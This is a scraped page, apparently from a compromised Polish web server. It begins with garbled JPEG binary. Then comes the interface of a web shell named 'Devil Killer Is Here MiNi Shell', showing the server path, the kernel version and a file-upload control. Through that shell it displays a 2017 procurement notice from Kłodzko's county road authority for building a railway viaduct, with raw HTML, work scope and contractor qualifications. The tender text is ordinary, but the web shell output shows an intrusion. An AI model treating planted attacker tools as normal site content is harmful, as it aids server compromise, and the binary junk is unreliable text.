JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170424/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170424/71810-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.zdp.bip.klodzko.pl' target='_blank'>http://www.zdp.bip.klodzko.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 71810 - 2017
              z dnia 2017-04-24 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Kłodzko: "Budowa nowego wiaduktu kolejowego w ciągu linii PLK 276 (w km 113,040) w Bystrzycy Kłodzkiej - Przedmieście"<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Zarząd Dróg Powiatowych, krajowy numer identyfikacyjny
              890723858, ul.
              Objazdowa 
              20,
              57-300 
              Kłodzko, woj.
              dolnośląskie, państwo
              Polska, tel.
              748680180, e-mail
              sekretariat@zdp.klodzko.pl, faks
              748680190.
              <br />
              Adres strony internetowej (URL): www.zdp.bip.klodzko.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Jednostki organizacyjne administracji samorządowej
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.zdp.bip.klodzko.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.zdp.bip.klodzko.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />w formie pisemnej<br />
                Adres:
                <br />Zarząd Dróg Powiatowych w Kłodzku, ul. Objazdowa 20, 57-300 Kłodzko</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>"Budowa nowego wiaduktu kolejowego w ciągu linii PLK 276 (w km 113,040) w Bystrzycy Kłodzkiej - Przedmieście"<br /><b>Numer referencyjny: </b>ZDP.2000/AZ/06/2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1. Nazwa zadania nadana przez Zamawiającego: Budowa nowego wiaduktu kolejowego w ciągu linii PLK 276 (w km 113,040) w Bystrzycy Kłodzkiej  Przedmieście.
2. Przedmiotem niniejszego zamówienia publicznego są: roboty budowlane
3. Zadanie jest realizowane w porozumieniu z: PKP S.A. Oddział Gospodarowania Nieruchomościami we Wrocławiu z siedzibą przy: ul. Joannitów 13, 50-525 Wrocław.  
4. Zakres prac, obejmuje:
1) roboty przygotowawcze i rozbiórkowe:
a) usunięcie krzaków i porostów z powierzchni korpusu nasypu kolejowego;
b) wykonanie nasypu tymczasowej drogi dojazdowej na wysokość korony nasypu kolejowego;
c) wykonanie nawierzchni z płyt drogowych typu PD-2 na warstwie pospółki na koronie tymczasowej drogi najazdowej;
d) przesunięcie istniejącej sekcji srk EON-3 o długości ok. 35 m w stronę Międzylesia wraz z jej zasilaniem;
e) wykonanie na istniejącej sieci napowietrznej 20 kV podwieszonej do istniejących słupów przęsła trakcyjnego usytuowanych w km 113.014,0 i km 113.074,0  wstawki kablowej 3x70 długości 5,0 m;
f) zabezpieczenia wymienionych wyżej słupów sieci trakcyjnej dodatkowymi odciągami stalowymi;
g) skablowanie na długości ok. 30 m istniejącego kabla eNA (3 x 25) z wyprowadzeniem zapasowej długości 5,0 m;
h) rozebranie istniejącego torowiska pod wbudowanie konstrukcji odciążających długości 5,50 m;
i) wbicie pali stalowych G-62 długości 12,0 m z poziomu korony nasypu kolejowego pomiędzy torem a krawędzią korony nasypu;
j) wbicie pali G-62 o długości od 12,0 do 4,0 m na skarpach w jednym rzędzie;
k) wbicie pali G-62 długości 4,0 m na odcinkach zamykających u podnóża skarpy nasypu kolejowego;
l) obcięcie górnych końców pali G-62 na koronie nasypu kolejowego;
m) usunięcie poprzez obcięcie pali G-62 na wysokości (głębokości) 9,0 m. Odcinki wewnętrzne pomiędzy gotowymi podporami wiaduktu;
2) wbudowanie konstrukcji odciążających:
a) przygotowanie górnych części pali G-62 wbitych na koronie nasypu kolejowego do zamontowania podciągu stalowego pod oparcie konstrukcji odciążających;
b) wykonanie stalowych podciągów pod oparcie konstrukcji odciążających, złożonych z 2 II  300 oraz 2 [ ]-300 ze sobą zespawanych długości po 4,50 m (wg projektu technologicznego);
c) wytworzenie w wytwórni konstrukcji stalowych gotowych konstrukcji odciążających złożonych z 4 szt. I-500 usztywnionych poprzecznie 4 szt.  [-300 (wg projektu technologicznego);
d) wbudowanie przy użyciu żurawia samochodowego lub kolejowego konstrukcji odciążających;
3) roboty ziemne pod podpory wiaduktu:
a) ręczne roboty ziemne bezpośrednio pod konstrukcją odciążającą w gruncie kat. III ÷ IV;
b) wykopy mechaniczne w gruntach jak wyżej  wykonane do poziomu istniejącego terenu, z odwozem urobku samochodami na odległość do 1 km;
c) częściowe wykopy w ściankach szczelnych wykonywane mechanicznie (przyjęto 50 %) w gruntach kat. III ÷ IV  z odwozem urobku na odkład w odległości do 1 km;
d) ręczne dokończenie wykopów w ściankach szczelnych (50 %) pod fundamenty podpór
e) pompowanie wody podczas ręcznych robót ziemnych;
f) wykonanie pionowego zabezpieczenia czołowych ścian wykopów ręcznych w ściankach szczelnych;
g) wykonanie na dnie wykopów betonowego korka B-15 (C-12/15) grubości 15 cm;
h) wykopy mechaniczne pod fundamenty skrzydeł wolnostojących przyczółków;
i) ręczne wykopy na głębokość 20 cm pod wykonanie betonowego korka E-15 pod fundamenty skrzydeł przyczółków;
j) wykonanie na dnie wykopów pod skrzydła betonowego korka B-15 (C-12/15) grubości 15 cm;
4) docelowe roboty ziemne pod nowy wiadukt:
a) mechaniczne wykopy pod nowym ustrojem nośnym wiaduktu w gruntach kat. III ÷ IV, z odwozem urobku samochodami na odległość do 1 km;
b) zasypka tylnych ścian korpusów podpór odpowiednio dobranym gruntem filtracyjnym z wyprowadzeniem drenażu  160 mm typu francuskiego za skrzydła;
c) zasypka fundamentów skrzydeł po ich uprzednim wykonaniu i zaizolowaniu bitumem na zimno;
d) zasypka jak wyżej lecz skrzydeł przyczółków;
5) konstrukcja podpór wiaduktu:
a) wykonanie na przygotowanym w ściankach szczelnych podłożu betonowym B-15 (korku) fundamentów pod korpusy podpór wiaduktu;
b) przygotowanie i montaż zbrojenia (wg zestawienie stali);
c) wbudowanie mieszanki betonowej B-30 przy użyciu pompy;
d) wykonanie korpusów podpór B-30 zbrojonych przypowierzchniowo siatki zbrojenia  10,0 mm o oczkach 10 x 10 cm;
e) wykonanie ław fundamentowych B-30 pod skrzydła podpór na gotowych korkach B-15;
f) wykonanie ścian skrzydeł przyczółków z betonu B-30 na gotowych fundamentach;
6) łożyska i konstrukcja ustroju nośnego:
a) wytworzenie w wytwórni konstrukcji stalowych łożysk wałkowych oraz nieprzesuwnych według rysunków projektowych oraz ich dostawa na plac budowy; 
b) ustawienie dostarczonych łożysk stalowych na gotowych korpusach podpór wiaduktu; 
c) wykonanie w wytwórni konstrukcji stalowych gotowego przęsła wiaduktu według projektu warsztatowego opracowanego na podstawie projektu budowlanego;
d) przygotowanie i dostawa na plac budowy wykonanej w wytwórni konstrukcji, wyposażonej w wypełnienia płyty ortotropowej wraz z izolacją termozgrzewalna i jej warstwa ochronną;
7) wbudowanie przęsła nowego wiaduktu:
a) przygotowanie torowiska z konstrukcją odciążającą i gotowymi podporami pod rozebranie odcinka toru o długości min 20,0 m wraz z usunięciem posypki; 
b) wbudowanie przy użyciu żurawia kolejowego dostarczonego ustroju nośnego wiaduktu;
c) ułożenie nowego torowiska na wbudowanym przęśle oraz dojazdach z wykonaniem regulacji toru o wznowieniu ruchu pociągów; 
d) zamontowanie ustroju nośnego nowego wiaduktu od strony rzeki Nysy Kłodzkiej  gotowej konstrukcji stalowej chodnika służbowego;
e) zamontowanie drewnianego pomostu na konstrukcji chodnika z dyliny impregnowanej o grubości 5 cm;
f) wykonanie zabezpieczenia przeciw porażeniowego konstrukcji przęsła według opracowanego projektu uzgodnionego z zarządcą linii kolejowej;
g) przywrócenie korony nasypu kolejowego w obrębie wbudowanej konstrukcji wiaduktu do warunków wymaganych przez zarządcę linii PLK nr 276;
Szczegółowy opis przedmiotu zamówienia określają: 
1) załącznik nr 1 do SIWZ  projekt budowlany;
2) załącznik nr 2 do SIWZ  projekt ochrony przeciwpożarowej;
3) załącznik nr 3 do SIWZ  projekt technologiczny;
4) załącznik nr 4 do SIWZ  dokumenty różne (uzgodnienia z PKP PLK, umowa z PKP Nieruchomości na korzystanie z nieruchomości, pozwolenie na budowę);
5) załącznik nr 5 do SIWZ  przedmiar robót;
6) załącznik nr 8 do SIWZ  kosztorys ofertowy;
Szczegółowe warunki wykonania robót określa: Szczegółowa Specyfikacja Techniczna Wykonania i Odbioru Robót (SSTWiOR) - załącznik nr 6 do SIWZ.
Zamawiający informuje, że ilekroć przedmiot zamówienia opisany jest przez wskazanie znaku towarowego, patentu lub pochodzenia, dopuszcza się rozwiązania równoważne z zastrzeżeniem, iż proponowane rozwiązania (materiały, urządzenia) będą posiadały parametry techniczne nie gorsze niż wymagane przez Zamawiającego i nie będą powodować konieczności przeprojektowania dokumentacji projektowej. Wykazanie równoważności zaoferowanego przedmiotu spoczywa na Wykonawcy, który jest obowiązany wykazać, że oferowane przez niego roboty budowlane (w tym m.in. proponowane materiały, urządzenia) spełniają wymagania określone przez Zamawiającego.
5. Wykonawca, którego oferta zostanie uznana za najkorzystniejszą zobowiązany będzie do realizacji przedmiotu zamówienia, zgodnie ze sporządzonym po podpisaniu umowy: harmonogramem rzeczowo - finansowym wykonania robót, wg wstępnego harmonogramu terminowo-rzeczowego ustalonego przez Zamawiającego, który będzie zawierał zakres prac wraz z terminami ich wykonania.
Wstępny harmonogram terminowo-rzeczowy realizacji zadania:
Maj  Czerwiec 2017: warsztatowe zlecenie wykonania konstrukcji stalowej przęsła wiaduktu w certyfikowanej wytwórni konstrukcji stalowych, zaakceptowanej przez Oddział PKP; całość robót przygotowawczych;
Lipiec 2017: wykonanie robót ziemnych; wykonanie przyczółków i łożysk, przywiezienie na plac budowy i docelowe wbudowanie przęsła wiaduktu, przekazanie wiaduktu do eksploatacji Oddziałowi PKP
Sierpień 2017: roboty wykończeniowe i porządkowe;
6. Na podstawie art. 29 ust. 3a ustawy PZP zamawiający wymaga, aby przy realizacji zamówienia Wykonawca zatrudniał, we własnym przedsiębiorstwie lub podwykonawcy, na podstawie umowy o pracę, osoby wykonującej czynności w zakresie realizacji przedmiotu zamówienia, tj.: 
1) operatorzy/kierowcy: koparek, ładowarek, dźwigu samochodowego lub kolejowego, płyt wibracyjnych, podbijarek uniwersalnych torowo-rozjazdowych, samochodów ciężarowych, itp.
2) usuwające drzewa, krzewy oraz plantujące skarpy nasypów;
3) wykonujące prace elektryczne związane z przebudową sieci napowietrznej 20 kV podwieszonej do istniejących słupów przęsła trakcyjnego;
4) wykonujące prace związane z demontażem istniejącego i budową nowego torowiska;
5) wykonujące prace zbrojeniowe, fundamentowe, montażowe, itp.
6) wykonujące prace porządkowe
Wymagania zatrudnienia przez wykonawcę lub podwykonawcę na podstawie umowy o pracę, o których mowa w art. 29 ust. 3a ustawy PZP, osób wykonujących wskazane przez Zamawiającego czynności w zakresie realizacji zamówienia zostały określone szczegółowo w załączniku nr 13 do SIWZ  wzór umowy.
7. Wykonawca zobowiązany jest zrealizować zamówienie na zasadach i warunkach opisanych we wzorze umowy stanowiącym załącznik nr 13 do SIWZ.
8. Wymagalny minimalny okres gwarancji wynosi 36 miesięcy, licząc od dnia odbioru końcowego zadania. <br /><br /><b>II.5) Główny kod CPV: </b>45100000-8<br /><b> Dodatkowe kody CPV:</b>45233000-9,
                45221113-7<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 31/08/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie dokonuje opisu spełnienia warunku<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie dokonuje opisu spełnienia warunku<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Wykonawca spełni warunek, jeżeli wykaże, że:
a) w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie wykonał, co najmniej dwie roboty budowlane odpowiadające swoim rodzajem robocie budowlanej stanowiącej przedmiot zamówienia, tj. roboty budowlane, wykonane w ramach jednej lub więcej umów, na zakres których składają się: budowa lub przebudowa (w rozumieniu ustawy z dn. 7 lipca 1994 r. Prawo budowlane,  Dz. U.  z 2016 r. poz. 290 z późn. zm.) lub modernizacja albo odnowienie (w rozumieniu ustawy z dn. 23 marca 2003 r. o transporcie kolejowym, Dz. U. 2003 nr 86 poz. 780 z późn. zm.) co najmniej dwa obiekty typu most drogowy lub kolejowy o rozpiętości najdłuższego przęsła nie mniejszej niż 5 m, i udokumentuje, że robota ta została wykonana w sposób należyty oraz zgodnie z zasadami sztuki budowlanej i prawidłowo ukończona.
Zamawiający dokona oceny spełnienia warunku w oparciu o uzupełniony przez Wykonawcę  Wykaz robót budowlanych (załącznik nr 10 do SIWZ).
W przypadku Wykonawców wspólnie ubiegających się o zamówienie warunek ten należy spełnić łącznie.
b)dysponuje lub będzie dysponował co najmniej 1 osobą posiadającą uprawnienia:
 kierownik budowy - posiadający uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności inżynieryjnej kolejowej w zakresie kolejowych obiektów budowlanych - z co najmniej pięcioletnim doświadczeniem zawodowym na stanowisku Kierownika budowy, w rozumieniu ustawy z dn. 7 lipca 1994 r. Prawo budowlane (Dz. U.  z 2016 r. poz. 290 z późn. zm.), na robotach związanych z budową lub przebudową, w rozumieniu ustawy z dn. 7 lipca 1994 r. Prawo budowlane (Dz. U.  z 2016 r. poz. 290 z późn. zm.), infrastruktury kolejowej;
 kierownik robót mostowych  posiadający uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności inżynieryjnej mostowej  z co najmniej trzyletnim doświadczeniem zawodowym na stanowisku Kierownika robót w specjalności  inżynieryjnej  mostowej,  w  rozumieniu  ustawy  Prawo  budowlane (Dz. U.  z 2016 r. poz. 290 z późn. zm.), na  robotach związanych z budową lub przebudową, w rozumieniu ustawy z dn. 7 lipca 1994 r. Prawo budowlane (Dz. U.  z 2016 r. poz. 290 z późn. zm.) obiektów inżynieryjnych takich jak: most, wiadukt, przepust, ściany oporowe, tunele liniowe, nadziemne i podziemne przejścia dla pieszych, w rozumieniu przepisów w sprawie warunków technicznych, jakimi powinny odpowiadać budowle kolejowe i ich usytuowanie;
 kierownik robót torowych  posiadający uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności inżynieryjnej kolejowej w zakresie kolejowych obiektów budowlanych  z co najmniej dwuletnim doświadczeniem zawodowym na stanowisku Kierownika robót w specjalności kolejowej, w rozumieniu ustawy z dn. 7 lipca 1994 r. Prawo budowlane (Dz. U.  z 2016 r. poz. 290 z późn. zm.), na robotach związanych z budową lub przebudową, w rozumieniu ustawy z dn. 7 lipca 1994 r. Prawo budowlane (Dz. U.  z 2016 r. poz. 290 z późn. zm.), lub modernizacją lub odnowieniem, w rozumieniu ustawy z dn. 23 marca 2003 r. o transporcie kolejowym (Dz. U. 2003 nr 86 poz. 780 z późn. zm.),  infrastruktury kolejowej w zakresie robót torowych;
 kierownik robót instalacyjnych  posiadający uprawnienia budowlane bez ograniczeń do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych - z co najmniej dwuletnim doświadczeniem zawodowym na stanowisku Kierownika robót w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, w rozumieniu ustawy z dn. 7 lipca 1994 r. Prawo budowlane (Dz. U.  z 2016 r. poz. 290 z późn. zm.), na robotach związanych z budową lub przebudową, w rozumieniu ustawy z dn. 7 lipca 1994 r. Prawo budowlane (Dz. U.  z 2016 r. poz. 290 z późn. zm.), lub modernizacją lub odnowieniem, w rozumieniu ustawy z dn. 23 marca 2003 r. o transporcie kolejowym (Dz. U. 2003 nr 86 poz. 780 z późn. zm.), infrastruktury kolejowej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych robót torowych;
 kierownik robót elektroenergetycznych  posiadający uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych  z co najmniej trzyletnim doświadczeniem zawodowym na stanowisku Kierownika robót w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, w rozumieniu ustawy z dn. 7 lipca 1994 r. Prawo budowlane (Dz. U.  z 2016 r. poz. 290 z późn. zm.), na robotach związanych z budową lub przebudową, w rozumieniu ustawy z dn. 7 lipca 1994 r. Prawo budowlane (Dz. U.  z 2016 r. poz. 290 z późn. zm.), lub modernizacją lub odnowieniem, w rozumieniu ustawy z dn. 23 marca 2003 r. o transporcie kolejowym (Dz. U. 2003 nr 86 poz. 780 z późn. zm.), infrastruktury kolejowej w zakresie sieci trakcyjnej.
 kierownik robót srk  posiadający uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych  z co najmniej trzyletnim doświadczeniem zawodowym na stanowisku Kierownika robót w zakresie sterowania ruchem kolejowym, w rozumieniu ustawy z dn. 7 lipca 1994 r. Prawo budowlane (Dz. U.  z 2016 r. poz. 290 z późn. zm.), na robotach związanych z budową lub przebudową, w rozumieniu ustawy z dn. 7 lipca 1994 r. Prawo budowlane (Dz. U.  z 2016 r. poz. 290 z późn. zm.), lub modernizacją lub odnowieniem, w rozumieniu ustawy z dn. 23 marca 2003 r. o transporcie kolejowym (Dz. U. 2003 nr 86 poz. 780 z późn. zm.), infrastruktury kolejowej w zakresie sterowania ruchem kolejowym.
